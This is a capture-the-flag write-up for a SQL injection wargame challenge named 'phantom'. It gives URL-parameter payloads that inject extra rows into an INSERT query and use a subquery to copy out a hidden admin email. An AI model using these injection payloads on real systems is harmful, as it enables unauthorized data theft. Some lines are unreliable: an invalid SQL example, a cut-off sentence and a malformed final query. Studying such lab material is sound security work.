phantom
We are provided with the SQL query:
INSERT INTO prob_phantom VALUES(0,'{$_SERVER[REMOTE_ADDR]}','{$_GET[joinmail]}')
This time, the table is updated based upon the parameter value that we provide.
If the no=1, the email will be displayed as **************.
In order to solve this challenge, we need to insert multiple records at the same time.
This can be done by listing multiple records in parentheses after VALUES, as follows:
INSERT INTO [table_name] VALUES(1, 1, 1), (2, 2, 2), (3, 3, 3);
If we provide the following URI parameter:
?joinmail=test'), (0, '[Public IP address]', (SELECT 1 WHERE 1=1)) -- -
You can find your public IP address from here.
The resultant query becomes:
INSERT INTO prob_phantom VALUES(0,'{$_SERVER[REMOTE_ADDR]}','test'), (0, '[Public IP address]', (SELECT 1 WHERE 1=1)) -- -')
As we can see, the two records have been inserted into the table.
In order to retrieve the email however, we will have to store it into a variable. In order to
Storing value in variable
SELECT email FROM prob_phantom WHERE no=1 AS temp
In this example, the email is stored in the temp variable.
If we provide the following URI parameter:
?joinmail=test'), (0, '[Public IP address]', (SELECT * FROM (SELECT email FROM prob_phantom WHERE no=1) AS temp)) -- -
The resultant query becomes:
INSERT INTO prob_phantom VALUES(0,'{$_SERVER[REMOTE_ADDR]}','test'), (0, '[Public IP address]', (SELECT * FROM (SELECT email FROM prob_phantom WHERE no=1) AS temp)) -- -')
The above query will store
admin_secure_email@rubiya.kr
If we provide the following URI parameter:
?email=admin_secure_email@rubiya.kr
The resultant query becomes:
SELECT email FROM prob_phantom WHERE no=1 AND email='?email=admin_secure_email@rubiya.kr'